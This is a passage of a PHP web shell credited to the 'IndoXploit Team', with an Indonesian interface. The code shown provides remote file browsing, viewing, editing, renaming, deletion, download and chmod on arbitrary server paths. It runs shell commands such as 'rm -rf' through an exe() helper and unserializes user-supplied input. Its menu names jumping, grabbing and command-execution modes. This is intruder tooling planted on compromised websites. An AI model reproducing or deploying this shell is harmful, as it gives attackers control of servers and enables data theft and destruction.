Directory"> <i class="bi bi-folder2-open"></i> </a> </div> </td> </tr>'; $counter++; } echo '</tbody></table></div>'; // Export options echo '<div class="mt-3"> <h6><i class="bi bi-download me-2"></i>Export Results:</h6> <form method="post" class="d-inline"> <input type="hidden" name="export_files" value="'.htmlspecialchars(serialize($files)).'"> <button type="submit" name="export_txt" class="btn btn-sm btn-outline-success"> <i class="bi bi-file-text me-1"></i>Export as TXT </button> </form> </div>'; } } else { echo '<div class="alert alert-danger"> <i class="bi bi-x-circle me-2"></i> Cannot read directory: '.$scan_dir.' </div>'; } } // Handle export if(isset($_POST['export_txt'])) { $files = unserialize($_POST['export_files']); $export_content = "Recursive Scan Results\n"; $export_content .= "Date: ".date('Y-m-d H:i:s')."\n"; $export_content .= "Directory: ".$_POST['scan_dir']."\n"; $export_content .= "Files Found: ".count($files)."\n\n"; foreach ($files as $index => $file) { $export_content .= ($index+1).". ".$file."\n"; } header('Content-Type: text/plain'); header('Content-Disposition: attachment; filename="scan_results_'.date('Ymd_His').'.txt"'); echo $export_content; exit; } echo '</div></div>'; } // ========== FILE MANAGER DAN OPERASI FILE LAINNYA ========== // Current Directory Navigation (untuk semua halaman kecuali yang sudah di-handle) elseif(!in_array($_GET['do'] ?? '', ['home', 'fileops', 'jumping', 'grab', 'scan', 'archive', 'system', 'upload', 'cmd'])) { // Handle file operations dari kode asli if (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'download') { $file = basename($_GET['file']); $filePath = __DIR__ . '/' . $file; if (file_exists($filePath)) { ob_end_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($filePath) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; } else { die("<div class='alert alert-danger'>Error: File tidak ditemukan!</div>"); } } elseif(isset($_GET['act']) && $_GET['act'] == 'newfile') { if(isset($_POST['new_save_file'])) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo $act; } echo ' <div class="container mt-4"> <h4 class="mb-3">Buat File Baru</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-file-earmark-plus"></i></span> <input type="text" name="newfile" value="newfile.php" class="form-control" placeholder="Nama file..." required> <button type="submit" name="new_save_file" class="btn btn-success"><i class="bi bi-plus-lg"></i> Buat File</button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'newfolder') { if(isset($_POST['new_save_folder'])) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "<font color=red>permission denied</font>"; } else { $act = "<script>window.location='?dir=".$dir."';</script>"; } echo $act; } echo ' <div class="container mt-4"> <h4 class="mb-3">Buat Folder Baru</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-folder-plus"></i></span> <input type="text" name="newfolder" class="form-control" placeholder="Nama Folder Baru" required> <button type="submit" class="btn btn-primary" name="new_save_folder"> <i class="bi bi-plus-lg"></i> Buat Folder </button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename_dir') { if(isset($_POST['dir_rename'])) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = "<script>window.location='?dir=".dirname($dir)."';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo "".$act."<br>"; } echo ' <div class="container mt-4"> <h4 class="mb-3">Ubah Nama Folder</h4> <form method="post"> <div class="input-group mb-3"> <span class="input-group-text"><i class="bi bi-folder"></i></span> <input type="text" value="' . basename($dir) . '" class="form-control" readonly> <input type="text" name="fol_rename" class="form-control" placeholder="Nama Baru" required> <button type="submit" class="btn btn-primary" name="dir_rename"> <i class="bi bi-pencil-square"></i> Ubah Nama </button> </div> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = "<script>window.location='?dir=".dirname($dir)."';</script>"; } else { $act = "<font color=red>could not remove ".basename($dir)."</font>"; } } echo $act; } elseif(isset($_GET['act']) && $_GET['act'] == 'view') { echo '<div class="container mt-4"> <h4 class="mb-3">File: <span class="text-success">' . htmlspecialchars(basename($_GET['file'])) . '</span></h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <textarea class="form-control" rows="10" readonly>' . htmlspecialchars(@file_get_contents($_GET['file'])) . '</textarea> </div>'; } elseif (isset($_GET['file']) && !empty($_GET['file']) && isset($_GET['act']) && $_GET['act'] == 'chmod_file') { $file = $_GET['file']; $dir = $_GET['dir'] ?? dirname($file); $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Ambil permission saat ini dalam format oktal if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { // Validasi izin harus dalam format oktal 3 digit $chmod_result = chmod($file, octdec($new_perm)); $msg = $chmod_result ? "<span class='text-success'>✅ Permission berhasil diubah menjadi $new_perm!</span>" : "<span class='text-danger'>❌ Gagal mengubah permission!</span>"; $current_perm = substr(sprintf('%o', fileperms($file)), -4); // Update permission setelah chmod } else { $msg = "<span class='text-danger'>❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755).</span>"; } } echo '<div class="container mt-4">'; echo '<h3>🛠 Ganti Permission (chmod) File</h3>'; echo isset($msg) ? "<p>$msg</p>" : ""; echo '<p>📂 <strong>File:</strong> ' . htmlspecialchars($file) . '</p>'; echo '<p>📍 <strong>Path:</strong> ' . htmlspecialchars($dir) . '</p>'; echo '<p>🔑 <strong>Permission Saat Ini:</strong> <code>' . $current_perm . '</code></p>'; echo '<form method="POST">'; echo '<label for="new_perm">🔄 Ubah Permission:</label>'; echo '<input type="text" name="new_perm" id="new_perm" class="form-control mb-2" placeholder="755" required>'; echo '<button type="submit" class="btn btn-primary">✅ Ubah Permission</button>'; echo '</form>'; echo '<br><a href="?dir=' . urlencode($dir) . '" class="btn btn-secondary">🔙 Kembali</a>'; echo '</div>'; } elseif (isset($_GET['dir']) && !empty($_GET['dir']) && isset($_GET['act']) && $_GET['act'] == 'chmod_dir') { $dir = $_GET['dir']; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); if (isset($_POST['new_perm'])) { $new_perm = $_POST['new_perm']; if (preg_match('/^[0-7]{3}$/', $new_perm)) { $chmod_result = chmod($dir, octdec($new_perm)); $msg = $chmod_result ? "<span class='text-success'>✅ Permission berhasil diubah menjadi $new_perm!</span>" : "<span class='text-danger'>❌ Gagal mengubah permission!</span>"; $current_perm = substr(sprintf('%o', fileperms($dir)), -4); } else { $msg = "<span class='text-danger'>❌ Format permission tidak valid! Gunakan format 3 digit (misal: 755).</span>"; } } echo '<div class="container mt-4">'; echo '<h3>🛠 Ganti Permission (chmod) Direktori</h3>'; echo isset($msg) ? "<p>$msg</p>" : ""; echo '<p>📂 <strong>Direktori:</strong> ' . htmlspecialchars($dir) . '</p>'; echo '<p>🔑 <strong>Permission Saat Ini:</strong> <code>' . $current_perm . '</code></p>'; echo '<form method="POST">'; echo '<label for="new_perm">🔄 Ubah Permission:</label>'; echo '<input type="text" name="new_perm" id="new_perm" class="form-control mb-2" placeholder="755" required>'; echo '<button type="submit" class="btn btn-primary">✅ Ubah Permission</button>'; echo '</form>'; echo '<br><a href="?dir=' . urlencode($dir) . '" class="btn btn-secondary">🔙 Kembali</a>'; echo '</div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'edit') { if (isset($_POST['save'])) { $save = file_put_contents($_GET['file'], $_POST['src']); if ($save) { $act = '<div class="alert alert-success" role="alert">✅ File berhasil disimpan!</div>'; } else { $act = '<div class="alert alert-danger" role="alert">❌ Permission Denied!</div>'; } echo $act; } echo '<div class="container mt-4"> <h4 class="mb-3">File: <span class="text-success">' . htmlspecialchars(basename($_GET['file'])) . '</span></h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . $dir . '&file=' . $_GET['file'] . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <form method="post"> <div class="mb-3"> <textarea name="src" class="form-control" rows="10">' . htmlspecialchars(@file_get_contents($_GET['file'])) . '</textarea> </div> <button type="submit" name="save" class="btn btn-primary w-100"><i class="bi bi-save"></i> Save</button> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'rename') { if (isset($_POST['do_rename'])) { $new_name = htmlspecialchars($_POST['rename']); $rename = rename($_GET['file'], "$dir/$new_name"); if ($rename) { echo "<script>window.location='?dir=" . urlencode($dir) . "';</script>"; exit; } else { echo '<div class="alert alert-danger" role="alert">❌ Permission Denied!</div>'; } } echo '<div class="container mt-4"> <h4 class="mb-3">Rename File</h4> <div class="btn-group mb-3" role="group"> <a href="?act=view&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-primary btn-sm"><i class="bi bi-eye"></i> View</a> <a href="?act=edit&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-warning btn-sm"><i class="bi bi-pencil-square"></i> Edit</a> <a href="?act=rename&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-info btn-sm"><i class="bi bi-pencil"></i> Rename</a> <a href="?act=download&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-success btn-sm"><i class="bi bi-download"></i> Download</a> <a href="?act=delete&dir=' . urlencode($dir) . '&file=' . urlencode($_GET['file']) . '" class="btn btn-outline-danger btn-sm"><i class="bi bi-trash"></i> Delete</a> </div> <form method="post" class="mb-3"> <div class="mb-3"> <label for="rename" class="form-label">New File Name:</label> <input type="text" name="rename" id="rename" value="' . htmlspecialchars(basename($_GET['file'])) . '" class="form-control" required> </div> <button type="submit" name="do_rename" class="btn btn-primary w-100"><i class="bi bi-arrow-right-circle"></i> Rename</button> </form> </div>'; } elseif(isset($_GET['act']) && $_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = "<script>window.location='?dir=".$dir."';</script>"; } else { $act = "<font color=red>permission denied</font>"; } echo $act; } // File Manager (Default View) else { // Current Directory Navigation echo '<div class="card mb-4"> <div class="card-body"> <nav aria-label="breadcrumb"> <ol class="breadcrumb mb-3">'; if (PHP_OS_FAMILY === "Windows") { echo '<li class="breadcrumb-item"><strong>Drives:</strong></li>'; foreach (range('A', 'Z') as $drive) { if (is_dir($drive . ':\\')) { echo '<li class="breadcrumb-item"> <a href="?dir='.$drive.':/" class="btn btn-sm btn-outline-info me-1"> <i class="bi bi-hdd"></i> '.$drive.' </a> </li>'; } } } echo '<li class="breadcrumb-item"><strong>Path:</strong></li>'; foreach ($scdir as $c_dir => $cdir) { echo '<li class="breadcrumb-item"> <a href="?dir='; for ($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if ($i != $c_dir) { echo "/"; } } echo '">'.$cdir.'</a> </li>'; } echo '</ol></nav>'; echo '<div class="d-flex gap-2"> <a href="?act=newfile&dir='.$dir.'" class="btn btn-success btn-sm"> <i class="bi bi-file-earmark-plus"></i> New File </a> <a href="?act=newfolder&dir='.$dir.'" class="btn btn-primary btn-sm"> <i class="bi bi-folder-plus"></i> New Folder </a> <span class="ms-auto">'.w($dir, perms($dir)).'</span> </div> </div> </div>'; echo '<div class="card mb-4"> <div class="card-header bg-dark d-flex justify-content-between align-items-center"> <h5 class="mb-0"><i class="bi bi-files me-2"></i>File Manager</h5> <span class="badge bg-secondary">'.count(glob("$dir/*")).' items</span> </div> <div class="card-body p-0"> <div class="table-responsive">'; if(is_dir($dir) && is_readable($dir)) { echo '<table class="table table-dark table-hover mb-0"> <thead class="table-secondary"> <tr> <th width="40%">Name</th> <th>Size</th> <th>Modified</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody>'; // Parent directory link if($dir != "/") { $parent = dirname($dir); echo '<tr> <td colspan="5"> <a href="?dir='.$parent.'" class="text-decoration-none text-info"> <i class="bi bi-arrow-up-circle me-2"></i>Parent Directory </a> </td> </tr>'; } $scandir = scandir($dir); $folders = []; $files = []; foreach($scandir as $item) { if($item == '.' || $item == '..') continue; if(is_dir("$dir/$item")) { $folders[] = $item; } else { $files[] = $item; } } // Display folders first foreach($folders as $folder) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$folder")); echo '<tr> <td> <i class="bi bi-folder-fill folder-icon me-2"></i> <a href="?dir='.$dir.'/'.$folder.'" class="text-decoration-none text-warning fw-bold"> '.$folder.' </a> </td> <td><span class="badge bg-secondary">DIR</span></td> <td>'.$ftime.'</td> <td> <a href="?act=chmod_dir&dir='.$dir.'/'.$folder.'" class="text-decoration-none"> '.w("$dir/$folder", perms("$dir/$folder")).' </a> </td> <td> <div class="btn-group btn-group-sm"> <a href="?act=rename_dir&dir='.$dir.'/'.$folder.'" class="btn btn-outline-warning" title="Rename"> <i class="bi bi-pencil"></i> </a> <a href="?act=delete_dir&dir='.$dir.'/'.$folder.'" class="btn btn-outline-danger" onclick="return confirm(\'Delete folder '.$folder.'?\')" title="Delete"> <i class="bi bi-trash"></i> </a> </div> </td> </tr>'; } // Display files foreach($files as $file) { $ftime = date("Y-m-d H:i", @filemtime("$dir/$file")); $size = formatSize("$dir/$file"); $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Set icon based on file extension $icon = 'bi-file-earmark'; $color = 'text-info'; if(in_array($ext, ['php', 'html', 'htm', 'js', 'css'])) { $icon = 'bi-file-code'; $color = 'text-success'; } elseif(in_array($ext, ['jpg', 'jpeg', 'png', 'gif', 'bmp'])) { $icon = 'bi-file-image'; $color = 'text-warning'; } elseif(in_array($ext, ['zip', 'rar', 'tar', 'gz'])) { $icon = 'bi-file-zip'; $color = 'text-danger'; } echo '<tr> <td> <i class="bi '.$icon.' '.$color.' me-2"></i> <a href="?act=view&dir='.$dir.'&file='.$dir.'/'.$file.'" class="text-decoration-none text-light"> '.$file.' </a> </td> <td><span class="badge bg-secondary">'.$size.'</span></td> <td>'.$ftime.'</td> <td> <a href="?act=chmod_file&dir='.$dir.'&file='.$dir.'/'.$file.'" class="text-decoration-none"> '.w("$dir/$file", perms("$dir/$file")).' </a> </td> <td> <div class="btn-group btn-group-sm"> <a href="?act=view&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-info" title="View"> <i class="bi bi-eye"></i> </a> <a href="?act=edit&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-warning" title="Edit"> <i class="bi bi-pencil-square"></i> </a> <a href="?act=download&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-success" title="Download"> <i class="bi bi-download"></i> </a> <a href="?act=delete&dir='.$dir.'&file='.$dir.'/'.$file.'" class="btn btn-outline-danger" onclick="return confirm(\'Delete file '.$file.'?\')" title="Delete"> <i class="bi bi-trash"></i> </a> </div> </td> </tr>'; } echo '</tbody></table>'; } else { echo '<div class="alert alert-danger m-3"> <i class="bi bi-exclamation-triangle me-2"></i> Cannot open directory. (Not readable) </div>'; } echo '</div></div></div>'; } } // Logout Handler if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo "<script>window.location='?';</script>"; } // Footer echo '<footer class="mt-4 pt-3 border-top border-secondary text-center text-muted"> <div class="row"> <div class="col-md-6"> <p class="mb-1"> <i class="bi bi-shield-fill-check me-1"></i> Session: <span class="text-info">'.session_id().'</span> </p> </div> <div class="col-md-6"> <p class="mb-1"> <i class="bi bi-heart-fill text-danger me-1"></i> Powered by: <span class="text-warning">IndoXploit Team</span> </p> </div> </div> <p class="mt-2 small"> © '.date("Y").' - All rights reserved </p> </footer>'; echo '</div>'; // Close container ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> <script> // Auto-focus on command input document.addEventListener('DOMContentLoaded', function() { const cmdInput = document.querySelector('input[name="cmd"]'); if(cmdInput) cmdInput.focus(); // Confirm delete actions const deleteLinks = document.querySelectorAll('a[onclick*="confirm"]'); deleteLinks.forEach(link => { link.addEventListener('click', function(e) { if(!confirm('Are you sure you want to delete this?')) { e.preventDefault(); } }); }); // Initialize tooltips var tooltipTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="tooltip"]')); var tooltipList = tooltipTriggerList.map(function (tooltipTriggerEl) { return new bootstrap.Tooltip(tooltipTriggerEl); }); }); </script> </body> </html>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply